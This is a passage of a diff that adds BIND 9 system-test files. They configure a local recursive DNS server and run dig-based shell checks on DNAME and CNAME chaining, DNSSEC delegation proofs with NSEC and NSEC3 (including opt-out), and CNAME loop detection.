a/bin/tests/system/chain/ns7/named.conf.in b/bin/tests/system/chain/ns7/named.conf.in new file mode 100644 index 0000000..31ca3ef --- /dev/null +++ b/bin/tests/system/chain/ns7/named.conf.in @@ -0,0 +1,45 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + directory "."; + query-source address 10.53.0.7; + notify-source 10.53.0.7; + transfer-source 10.53.0.7; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.7; }; + listen-on-v6 { fd92:7065:b8e:ffff::7; }; + recursion yes; + allow-recursion { any; }; + dnssec-validation yes; + deny-answer-aliases { + "example"; + } except-from { + "example"; + }; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.7 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { + type hint; + file "root.hint"; +}; diff --git a/bin/tests/system/chain/ns7/root.hint b/bin/tests/system/chain/ns7/root.hint new file mode 100644 index 0000000..4f3f48b --- /dev/null +++ b/bin/tests/system/chain/ns7/root.hint @@ -0,0 +1,14 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 999999 +. IN NS a.root-servers.nil. +a.root-servers.nil. IN A 10.53.0.1 diff --git a/bin/tests/system/chain/prereq.sh b/bin/tests/system/chain/prereq.sh new file mode 100644 index 0000000..b074318 --- /dev/null +++ b/bin/tests/system/chain/prereq.sh @@ -0,0 +1,50 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +if test -n "$PYTHON" +then + if $PYTHON -c "import dns" 2> /dev/null + then + : + else + echo_i "This test requires the dnspython module." >&2 + exit 1 + fi +else + echo_i "This test requires Python and the dnspython module." >&2 + exit 1 +fi + +if $PERL -e 'use Net::DNS;' 2>/dev/null +then + if $PERL -e 'use Net::DNS; die if ($Net::DNS::VERSION >= 0.69 && $Net::DNS::VERSION <= 0.74);' 2>/dev/null + then + : + else + echo_i "Net::DNS versions 0.69 to 0.74 have bugs that cause this test to fail: please update." >&2 + exit 1 + fi +else + echo_i "This test requires the perl Net::DNS library." >&2 + exit 1 +fi +if $PERL -e 'use Net::DNS::Nameserver;' 2>/dev/null +then + : +else + echo_i "This test requires the Net::DNS::Nameserver library." >&2 + exit 1 +fi diff --git a/bin/tests/system/chain/setup.sh b/bin/tests/system/chain/setup.sh new file mode 100644 index 0000000..a2c47ae --- /dev/null +++ b/bin/tests/system/chain/setup.sh @@ -0,0 +1,23 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +copy_setports ns1/named.conf.in ns1/named.conf +copy_setports ns2/named.conf.in ns2/named.conf +copy_setports ns5/named.conf.in ns5/named.conf +copy_setports ns7/named.conf.in ns7/named.conf + +cd ns2 +$SHELL sign.sh diff --git a/bin/tests/system/chain/tests.sh b/bin/tests/system/chain/tests.sh new file mode 100644 index 0000000..19cdb68 --- /dev/null +++ b/bin/tests/system/chain/tests.sh @@ -0,0 +1,625 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +DIGOPTS="-p ${PORT}" +RNDCCMD="$RNDC -c $SYSTEMTESTTOP/common/rndc.conf -p ${CONTROLPORT} -s" +SEND="$PERL $SYSTEMTESTTOP/send.pl 10.53.0.4 ${EXTRAPORT1}" +status=0 +n=0 + +n=`expr $n + 1` +echo_i "checking short DNAME from authoritative ($n)" +ret=0 +$DIG $DIGOPTS a.short-dname.example @10.53.0.2 a > dig.out.ns2.short || ret=1 +grep "status: NOERROR" dig.out.ns2.short > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking short DNAME from recursive ($n)" +ret=0 +$RNDCCMD 10.53.0.7 null --- start test$n --- 2>&1 | sed 's/^/ns7 /' | cat_i +$DIG $DIGOPTS a.short-dname.example @10.53.0.7 a > dig.out.ns4.short || ret=1 +grep "status: NOERROR" dig.out.ns4.short > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking long DNAME from authoritative ($n)" +ret=0 +$DIG $DIGOPTS a.long-dname.example @10.53.0.2 a > dig.out.ns2.long || ret=1 +grep "status: NOERROR" dig.out.ns2.long > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking long DNAME from recursive ($n)" +ret=0 +$RNDCCMD 10.53.0.7 null --- start test$n --- 2>&1 | sed 's/^/ns7 /' | cat_i +$DIG $DIGOPTS a.long-dname.example @10.53.0.7 a > dig.out.ns4.long || ret=1 +grep "status: NOERROR" dig.out.ns4.long > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking (too) long DNAME from authoritative ($n)" +ret=0 +$DIG $DIGOPTS 01234567890123456789012345678901234567890123456789.longlonglonglonglonglonglonglonglonglonglonglonglonglonglong.longlonglonglonglonglonglonglonglonglonglonglonglonglonglong.longlonglonglonglonglonglonglonglonglonglonglonglonglonglong.long-dname.example @10.53.0.2 a > dig.out.ns2.toolong || ret=1 +grep "status: YXDOMAIN" dig.out.ns2.toolong > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking (too) long DNAME from recursive with cached DNAME ($n)" +ret=0 +$RNDCCMD 10.53.0.7 null --- start test$n --- 2>&1 | sed 's/^/ns7 /' | cat_i +$DIG $DIGOPTS 01234567890123456789012345678901234567890123456789.longlonglonglonglonglonglonglonglonglonglonglonglonglonglong.longlonglonglonglonglonglonglonglonglonglonglonglonglonglong.longlonglonglonglonglonglonglonglonglonglonglonglonglonglong.long-dname.example @10.53.0.7 a > dig.out.ns4.cachedtoolong || ret=1 +grep "status: YXDOMAIN" dig.out.ns4.cachedtoolong > /dev/null || ret=1 +grep '^long-dname\.example\..*DNAME.*long' dig.out.ns4.cachedtoolong > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking (too) long DNAME from recursive without cached DNAME ($n)" +ret=0 +$RNDCCMD 10.53.0.7 null --- start test$n --- 2>&1 | sed 's/^/ns7 /' | cat_i +$DIG $DIGOPTS 01234567890123456789012345678901234567890123456789.longlonglonglonglonglonglonglonglonglonglonglonglonglonglong.longlonglonglonglonglonglonglonglonglonglonglonglonglonglong.longlonglonglonglonglonglonglonglonglonglonglonglonglong.toolong-dname.example @10.53.0.7 a > dig.out.ns4.uncachedtoolong || ret=1 +grep "status: YXDOMAIN" dig.out.ns4.uncachedtoolong > /dev/null || ret=1 +grep '^toolong-dname\.example\..*DNAME.*long' dig.out.ns4.uncachedtoolong > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +find_records() { + owner_name="$1" + rr_type="$2" + file="$3" + awk '$1 == "'"$owner_name"'" && $4 == "'"$rr_type"'" { print }' < "$file" +} + +count_records() { + owner_name="$1" + rr_type="$2" + file="$3" + find_records "$owner_name" "$rr_type" "$file" | wc -l +} + +exactly_one_record_exists_for() { + owner_name="$1" + rr_type="$2" + file="$3" + test "$(count_records "$owner_name" "$rr_type" "$file")" -eq 1 +} + +no_records_exist_for() { + owner_name="$1" + rr_type="$2" + file="$3" + test "$(count_records "$owner_name" "$rr_type" "$file")" -eq 0 +} + +ensure_no_ds_in_bitmap() { + owner_name="$1" + rr_type="$2" + file="$3" + case "$rr_type" in + NSEC) start_index=6 ;; + NSEC3) start_index=10 ;; + *) exit 1 ;; + esac + find_records "$owner_name" "$rr_type" "$file" | awk '{ for (i='"$start_index"'; i<=NF; i++) if ($i == "DS") exit 1 }' +} + +n=`expr $n + 1` +echo_i "checking secure delegation prepared using CNAME chaining ($n)" +ret=0 +# QNAME exists, so the AUTHORITY section should only contain an NS RRset and a +# DS RRset. +$DIG $DIGOPTS @10.53.0.2 cname.wildcard-secure.example A +norec +dnssec > dig.out.2.$n 2>&1 || ret=1 +# Ensure that the AUTHORITY section contains the expected NS and DS RRsets. +exactly_one_record_exists_for "delegation.wildcard-secure.example." NS dig.out.2.$n || ret=1 +exactly_one_record_exists_for "delegation.wildcard-secure.example." DS dig.out.2.$n || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking secure delegation prepared using wildcard expansion + CNAME chaining ($n)" +ret=0 +# QNAME does not exist, so the AUTHORITY section should contain an NS RRset, an +# NSEC record proving nonexistence of QNAME, and a DS RRset at the zone cut. +$DIG $DIGOPTS @10.53.0.2 a-nonexistent-name.wildcard-secure.example A +norec +dnssec > dig.out.2.$n 2>&1 || ret=1 +# Ensure that the AUTHORITY section contains the expected NS and DS RRsets. +exactly_one_record_exists_for "delegation.wildcard-secure.example." NS dig.out.2.$n || ret=1 +exactly_one_record_exists_for "delegation.wildcard-secure.example." DS dig.out.2.$n || ret=1 +# Check NSEC records in the AUTHORITY section. +no_records_exist_for "wildcard-secure.example." NSEC dig.out.2.$n || ret=1 +exactly_one_record_exists_for "*.wildcard-secure.example." NSEC dig.out.2.$n || ret=1 +no_records_exist_for "cname.wildcard-secure.example." NSEC dig.out.2.$n || ret=1 +no_records_exist_for "delegation.wildcard-secure.example." NSEC dig.out.2.$n || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking insecure delegation prepared using CNAME chaining, NSEC ($n)" +ret=0 +# QNAME exists, so the AUTHORITY section should only contain an NS RRset and a +# single NSEC record proving nonexistence of a DS RRset at the zone cut. +$DIG $DIGOPTS @10.53.0.2 cname.wildcard-nsec.example A +norec +dnssec > dig.out.2.$n 2>&1 || ret=1 +# Ensure that the AUTHORITY section contains an NS RRset without an associated +# DS RRset. +exactly_one_record_exists_for "delegation.wildcard-nsec.example." NS dig.out.2.$n || ret=1 +no_records_exist_for "delegation.wildcard-nsec.example." DS dig.out.2.$n || ret=1 +# Check NSEC records in the AUTHORITY section. +no_records_exist_for "wildcard-nsec.example." NSEC dig.out.2.$n || ret=1 +no_records_exist_for "*.wildcard-nsec.example." NSEC dig.out.2.$n || ret=1 +no_records_exist_for "cname.wildcard-nsec.example." NSEC dig.out.2.$n || ret=1 +exactly_one_record_exists_for "delegation.wildcard-nsec.example." NSEC dig.out.2.$n || ret=1 +# Ensure the NSEC record for the zone cut does not have the DS bit set in the +# type bit map. +ensure_no_ds_in_bitmap "delegation.wildcard-nsec.example." NSEC dig.out.2.$n || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking insecure delegation prepared using wildcard expansion + CNAME chaining, NSEC, QNAME #1 ($n)" +ret=0 +# QNAME does not exist, so the AUTHORITY section should contain an NS RRset and +# NSEC records proving nonexistence of both QNAME and a DS RRset at the zone +# cut. In this test case, these two NSEC records are different. +$DIG $DIGOPTS @10.53.0.2 a-nonexistent-name.wildcard-nsec.example A +norec +dnssec > dig.out.2.$n 2>&1 || ret=1 +# Ensure that the AUTHORITY section contains an NS RRset without an associated +# DS RRset. +exactly_one_record_exists_for "delegation.wildcard-nsec.example." NS dig.out.2.$n || ret=1 +no_records_exist_for "delegation.wildcard-nsec.example." DS dig.out.2.$n || ret=1 +# Check NSEC records in the AUTHORITY section. +no_records_exist_for "wildcard-nsec.example." NSEC dig.out.2.$n || ret=1 +exactly_one_record_exists_for "*.wildcard-nsec.example." NSEC dig.out.2.$n || ret=1 +no_records_exist_for "cname.wildcard-nsec.example." NSEC dig.out.2.$n || ret=1 +exactly_one_record_exists_for "delegation.wildcard-nsec.example." NSEC dig.out.2.$n || ret=1 +# Ensure the NSEC record for the zone cut does not have the DS bit set in the +# type bit map. +ensure_no_ds_in_bitmap "delegation.wildcard-nsec.example." NSEC dig.out.2.$n || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking insecure delegation prepared using wildcard expansion + CNAME chaining, NSEC, QNAME #2 ($n)" +ret=0 +# QNAME does not exist, so the AUTHORITY section should contain an NS RRset and +# NSEC records proving nonexistence of both QNAME and a DS RRset at the zone +# cut. In this test case, the same NSEC record proves nonexistence of both the +# QNAME and the DS RRset at the zone cut. +$DIG $DIGOPTS @10.53.0.2 z-nonexistent-name.wildcard-nsec.example A +norec +dnssec > dig.out.2.$n 2>&1 || ret=1 +# Ensure that the AUTHORITY section contains an NS RRset without an associated +# DS RRset. +exactly_one_record_exists_for "delegation.wildcard-nsec.example." NS dig.out.2.$n || ret=1 +no_records_exist_for "delegation.wildcard-nsec.example." DS dig.out.2.$n || ret=1 +# Check NSEC records in the AUTHORITY section. +no_records_exist_for "wildcard-nsec.example." NSEC dig.out.2.$n || ret=1 +no_records_exist_for "*.wildcard-nsec.example." NSEC dig.out.2.$n || ret=1 +no_records_exist_for "cname.wildcard-nsec.example." NSEC dig.out.2.$n || ret=1 +exactly_one_record_exists_for "delegation.wildcard-nsec.example." NSEC dig.out.2.$n || ret=1 +# Ensure the NSEC record for the zone cut does not have the DS bit set in the +# type bit map. +ensure_no_ds_in_bitmap "delegation.wildcard-nsec.example." NSEC dig.out.2.$n || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Relevant NSEC3 hashes: +# +# - existing names: +# +# $ nsec3hash - 1 0 wildcard-nsec3.example. +# 38IVP9CN0LBISO6H3V5REQCKMTHLI5AN (salt=-, hash=1, iterations=0) +# $ nsec3hash - 1 0 cname.wildcard-nsec3.example. +# 3DV6GNNVR0O8LA4DC4CHL2JTVNHT8Q1D (salt=-, hash=1, iterations=0) +# $ nsec3hash - 1 0 delegation.wildcard-nsec3.example. +# AVKOGGGVJHFSLQA68TILKFKJ94AV4MNC (salt=-, hash=1, iterations=0) +# $ nsec3hash - 1 0 *.wildcard-nsec3.example. +# Q64D8L8HLSB3L98S59PM8OSSMI7SMQA2 (salt=-, hash=1, iterations=0) +# +# - nonexistent names: +# +# $ nsec3hash - 1 0 a-nonexistent-name.wildcard-nsec3.example. +# PST9IH6M0DG3M139CO3G12NUP4ER88SH (salt=-, hash=1, iterations=0) +# $ nsec3hash - 1 0 z-nonexistent-name.wildcard-nsec3.example. +# SG2DEHEAOGCKP7FTNQAUVC3I3TIPJH0J (salt=-, hash=1, iterations=0) + +n=`expr $n + 1` +echo_i "checking insecure delegation prepared using CNAME chaining, NSEC3 ($n)" +ret=0 +# QNAME exists, so the AUTHORITY section should only contain an NS RRset and a +# single NSEC3 record proving nonexistence of a DS RRset at the zone cut. +$DIG $DIGOPTS @10.53.0.2 cname.wildcard-nsec3.example A +norec +dnssec > dig.out.2.$n 2>&1 || ret=1 +# Ensure that the AUTHORITY section contains an NS RRset without an associated +# DS RRset. +exactly_one_record_exists_for "delegation.wildcard-nsec3.example." NS dig.out.2.$n || ret=1 +no_records_exist_for "delegation.wildcard-nsec3.example." DS dig.out.2.$n || ret=1 +# Check NSEC3 records in the AUTHORITY section. +no_records_exist_for "38IVP9CN0LBISO6H3V5REQCKMTHLI5AN.wildcard-nsec3.example." NSEC3 dig.out.2.$n || ret=1 +no_records_exist_for "3DV6GNNVR0O8LA4DC4CHL2JTVNHT8Q1D.wildcard-nsec3.example." NSEC3 dig.out.2.$n || ret=1 +exactly_one_record_exists_for "AVKOGGGVJHFSLQA68TILKFKJ94AV4MNC.wildcard-nsec3.example." NSEC3 dig.out.2.$n || ret=1 +no_records_exist_for "Q64D8L8HLSB3L98S59PM8OSSMI7SMQA2.wildcard-nsec3.example." NSEC3 dig.out.2.$n || ret=1 +# Ensure the NSEC3 record matching the zone cut does not have the DS bit set in +# the type bit map. +ensure_no_ds_in_bitmap "AVKOGGGVJHFSLQA68TILKFKJ94AV4MNC.wildcard-nsec3.example." NSEC3 dig.out.2.$n || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking insecure delegation prepared using wildcard expansion + CNAME chaining, NSEC3, QNAME #1 ($n)" +ret=0 +# QNAME does not exist, so the AUTHORITY section should contain an NS RRset and +# NSEC3 records proving nonexistence of both QNAME and a DS RRset at the zone +# cut. In this test case, these two NSEC3 records are different. +$DIG $DIGOPTS @10.53.0.2 z-nonexistent-name.wildcard-nsec3.example A +norec +dnssec > dig.out.2.$n 2>&1 || ret=1 +# Ensure that the AUTHORITY section contains an NS RRset without an associated +# DS RRset. +exactly_one_record_exists_for "delegation.wildcard-nsec3.example." NS dig.out.2.$n || ret=1 +no_records_exist_for "delegation.wildcard-nsec3.example." DS dig.out.2.$n || ret=1 +# Check NSEC3 records in the AUTHORITY section. +no_records_exist_for "38IVP9CN0LBISO6H3V5REQCKMTHLI5AN.wildcard-nsec3.example." NSEC3 dig.out.2.$n || ret=1 +no_records_exist_for "3DV6GNNVR0O8LA4DC4CHL2JTVNHT8Q1D.wildcard-nsec3.example." NSEC3 dig.out.2.$n || ret=1 +exactly_one_record_exists_for "AVKOGGGVJHFSLQA68TILKFKJ94AV4MNC.wildcard-nsec3.example." NSEC3 dig.out.2.$n || ret=1 +exactly_one_record_exists_for "Q64D8L8HLSB3L98S59PM8OSSMI7SMQA2.wildcard-nsec3.example." NSEC3 dig.out.2.$n || ret=1 +# Ensure the NSEC3 record matching the zone cut does not have the DS bit set in +# the type bit map. +ensure_no_ds_in_bitmap "AVKOGGGVJHFSLQA68TILKFKJ94AV4MNC.wildcard-nsec3.example." NSEC3 dig.out.2.$n || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking insecure delegation prepared using wildcard expansion + CNAME chaining, NSEC3, QNAME #2 ($n)" +ret=0 +# QNAME does not exist, so the AUTHORITY section should contain an NS RRset and +# NSEC3 records proving nonexistence of both QNAME and a DS RRset at the zone +# cut. In this test case, the same NSEC3 record proves nonexistence of both the +# QNAME and the DS RRset at the zone cut. +$DIG $DIGOPTS @10.53.0.2 a-nonexistent-name.wildcard-nsec3.example A +norec +dnssec > dig.out.2.$n 2>&1 || ret=1 +# Ensure that the AUTHORITY section contains an NS RRset without an associated +# DS RRset. +exactly_one_record_exists_for "delegation.wildcard-nsec3.example." NS dig.out.2.$n || ret=1 +no_records_exist_for "delegation.wildcard-nsec3.example." DS dig.out.2.$n || ret=1 +# Check NSEC3 records in the AUTHORITY section. +no_records_exist_for "38IVP9CN0LBISO6H3V5REQCKMTHLI5AN.wildcard-nsec3.example." NSEC3 dig.out.2.$n || ret=1 +no_records_exist_for "3DV6GNNVR0O8LA4DC4CHL2JTVNHT8Q1D.wildcard-nsec3.example." NSEC3 dig.out.2.$n || ret=1 +exactly_one_record_exists_for "AVKOGGGVJHFSLQA68TILKFKJ94AV4MNC.wildcard-nsec3.example." NSEC3 dig.out.2.$n || ret=1 +no_records_exist_for "Q64D8L8HLSB3L98S59PM8OSSMI7SMQA2.wildcard-nsec3.example." NSEC3 dig.out.2.$n || ret=1 +# Ensure the NSEC3 record matching the zone cut does not have the DS bit set in +# the type bit map. +ensure_no_ds_in_bitmap "AVKOGGGVJHFSLQA68TILKFKJ94AV4MNC.wildcard-nsec3.example." NSEC3 dig.out.2.$n || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Relevant NSEC3 hashes: +# +# - existing names with corresponding NSEC3 records: +# +# $ nsec3hash - 1 0 *.wildcard-nsec3-optout.example. +# 2JGSPT59VJ7R9SQB5B9P6HPM5JBATOOO (salt=-, hash=1, iterations=0) +# $ nsec3hash - 1 0 cname.wildcard-nsec3-optout.example. +# OKRFKC9SS1O60E8U2980UD62MUSMKGUG (salt=-, hash=1, iterations=0) +# $ nsec3hash - 1 0 wildcard-nsec3-optout.example. +# SS5M1RUBSGMANEQ1VLRDDEC6SOAT7HNI (salt=-, hash=1, iterations=0) +# +# - existing name with no corresponding NSEC3 record due to opt-out: +# +# $ nsec3hash - 1 0 delegation.wildcard-nsec3-optout.example. +# UFP8PVECFTD57HU5PUD2HE0ES37QEOAP (salt=-, hash=1, iterations=0) +# +# - nonexistent names: +# +# $ nsec3hash - 1 0 b-nonexistent-name.wildcard-nsec3-optout.example. +# 3J38JE2OU0O7B4CE2ADMBBKJ5HT994S5 (salt=-, hash=1, iterations=0) +# $ nsec3hash - 1 0 z-nonexistent-name.wildcard-nsec3-optout.example. +# V7OTS4791T9SU0HKVL93EVNAJ9JH2CH3 (salt=-, hash=1, iterations=0) + +n=`expr $n + 1` +echo_i "checking insecure delegation prepared using CNAME chaining, NSEC3 with opt-out ($n)" +ret=0 +# QNAME exists, so the AUTHORITY section should only contain an NS RRset and a +# single NSEC3 record proving nonexistence of a DS RRset at the zone cut. +$DIG $DIGOPTS @10.53.0.2 cname.wildcard-nsec3-optout.example A +norec +dnssec > dig.out.2.$n 2>&1 || ret=1 +# Ensure that the AUTHORITY section contains an NS RRset without an associated +# DS RRset. +exactly_one_record_exists_for "delegation.wildcard-nsec3-optout.example." NS dig.out.2.$n || ret=1 +no_records_exist_for "delegation.wildcard-nsec3-optout.example." DS dig.out.2.$n || ret=1 +# Check NSEC3 records in the AUTHORITY section. +no_records_exist_for "2JGSPT59VJ7R9SQB5B9P6HPM5JBATOOO.wildcard-nsec3-optout.example." NSEC3 dig.out.2.$n || ret=1 +no_records_exist_for "OKRFKC9SS1O60E8U2980UD62MUSMKGUG.wildcard-nsec3-optout.example." NSEC3 dig.out.2.$n || ret=1 +exactly_one_record_exists_for "SS5M1RUBSGMANEQ1VLRDDEC6SOAT7HNI.wildcard-nsec3-optout.example." NSEC3 dig.out.2.$n || ret=1 +# Ensure the NSEC3 record covering the zone cut does not have the DS bit set in +# the type bit map. +ensure_no_ds_in_bitmap "SS5M1RUBSGMANEQ1VLRDDEC6SOAT7HNI.wildcard-nsec3-optout.example." NSEC3 dig.out.2.$n || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking insecure delegation prepared using wildcard expansion + CNAME chaining, NSEC3 with opt-out, QNAME #1 ($n)" +ret=0 +# QNAME does not exist, so the AUTHORITY section should contain an NS RRset and +# NSEC3 records proving nonexistence of both QNAME and a DS RRset at the zone +# cut. In this test case, these two NSEC3 records are different. +$DIG $DIGOPTS @10.53.0.2 b-nonexistent-name.wildcard-nsec3-optout.example A +norec +dnssec > dig.out.2.$n 2>&1 || ret=1 +# Ensure that the AUTHORITY section contains an NS RRset without an associated +# DS RRset. +exactly_one_record_exists_for "delegation.wildcard-nsec3-optout.example." NS dig.out.2.$n || ret=1 +no_records_exist_for "delegation.wildcard-nsec3-optout.example." DS dig.out.2.$n || ret=1 +# Check NSEC3 records in the AUTHORITY section. +exactly_one_record_exists_for "2JGSPT59VJ7R9SQB5B9P6HPM5JBATOOO.wildcard-nsec3-optout.example." NSEC3 dig.out.2.$n || ret=1 +no_records_exist_for "OKRFKC9SS1O60E8U2980UD62MUSMKGUG.wildcard-nsec3-optout.example." NSEC3 dig.out.2.$n || ret=1 +exactly_one_record_exists_for "SS5M1RUBSGMANEQ1VLRDDEC6SOAT7HNI.wildcard-nsec3-optout.example." NSEC3 dig.out.2.$n || ret=1 +# Ensure the NSEC3 record covering the zone cut does not have the DS bit set in +# the type bit map. +ensure_no_ds_in_bitmap "SS5M1RUBSGMANEQ1VLRDDEC6SOAT7HNI.wildcard-nsec3-optout.example." NSEC3 dig.out.2.$n || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking insecure delegation prepared using wildcard expansion + CNAME chaining, NSEC3 with opt-out, QNAME #2 ($n)" +ret=0 +# QNAME does not exist, so the AUTHORITY section should contain an NS RRset and +# NSEC3 records proving nonexistence of both QNAME and a DS RRset at the zone +# cut. In this test case, the same NSEC3 record proves nonexistence of both the +# QNAME and the DS RRset at the zone cut. +$DIG $DIGOPTS @10.53.0.2 z-nonexistent-name.wildcard-nsec3-optout.example A +norec +dnssec > dig.out.2.$n 2>&1 || ret=1 +# Ensure that the AUTHORITY section contains an NS RRset without an associated +# DS RRset. +exactly_one_record_exists_for "delegation.wildcard-nsec3-optout.example." NS dig.out.2.$n || ret=1 +no_records_exist_for "delegation.wildcard-nsec3-optout.example." DS dig.out.2.$n || ret=1 +# Check NSEC3 records in the AUTHORITY section. +no_records_exist_for "2JGSPT59VJ7R9SQB5B9P6HPM5JBATOOO.wildcard-nsec3-optout.example." NSEC3 dig.out.2.$n || ret=1 +no_records_exist_for "OKRFKC9SS1O60E8U2980UD62MUSMKGUG.wildcard-nsec3-optout.example." NSEC3 dig.out.2.$n || ret=1 +exactly_one_record_exists_for "SS5M1RUBSGMANEQ1VLRDDEC6SOAT7HNI.wildcard-nsec3-optout.example." NSEC3 dig.out.2.$n || ret=1 +# Ensure the NSEC3 record covering the zone cut does not have the DS bit set in +# the type bit map. +ensure_no_ds_in_bitmap "SS5M1RUBSGMANEQ1VLRDDEC6SOAT7HNI.wildcard-nsec3-optout.example." NSEC3 dig.out.2.$n || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking CNAME to DNAME from authoritative ($n)" +ret=0 +$DIG $DIGOPTS cname.example @10.53.0.2 a > dig.out.ns2.cname +grep "status: NOERROR" dig.out.ns2.cname > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking CNAME to DNAME from recursive" +ret=0 +$RNDCCMD 10.53.0.7 null --- start test$n --- 2>&1 | sed 's/^/ns7 /' | cat_i +$DIG $DIGOPTS cname.example @10.53.0.7 a > dig.out.ns4.cname +grep "status: NOERROR" dig.out.ns4.cname > /dev/null || ret=1 +grep '^cname.example.' dig.out.ns4.cname > /dev/null || ret=1 +grep '^cnamedname.example.' dig.out.ns4.cname > /dev/null || ret=1 +grep '^a.cnamedname.example.' dig.out.ns4.cname > /dev/null || ret=1 +grep '^a.target.example.' dig.out.ns4.cname > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking DNAME is returned with synthesized CNAME before DNAME ($n)" +ret=0 +$RNDCCMD 10.53.0.7 null --- start test$n --- 2>&1 | sed 's/^/ns7 /' | cat_i +$DIG $DIGOPTS @10.53.0.7 name.synth-then-dname.example.broken A > dig.out.test$n +grep "status: NXDOMAIN" dig.out.test$n > /dev/null || ret=1 +grep '^name.synth-then-dname\.example\.broken\..*CNAME.*name.$' dig.out.test$n > /dev/null || ret=1 +grep '^synth-then-dname\.example\.broken\..*DNAME.*\.$' dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking DNAME is returned with CNAME to synthesized CNAME before DNAME ($n)" +ret=0 +$RNDCCMD 10.53.0.7 null --- start test$n --- 2>&1 | sed 's/^/ns7 /' | cat_i +$DIG $DIGOPTS @10.53.0.7 cname-to-synth2-then-dname.example.broken A > dig.out.test$n +grep "status: NXDOMAIN" dig.out.test$n > /dev/null || ret=1 +grep '^cname-to-synth2-then-dname\.example\.broken\..*CNAME.*name\.synth2-then-dname\.example\.broken.$' dig.out.test$n > /dev/null || ret=1 +grep '^name\.synth2-then-dname\.example\.broken\..*CNAME.*name.$' dig.out.test$n > /dev/null || ret=1 +grep '^synth2-then-dname\.example\.broken\..*DNAME.*\.$' dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking CNAME loops are detected ($n)" +ret=0 +$RNDCCMD 10.53.0.7 null --- start test$n --- 2>&1 | 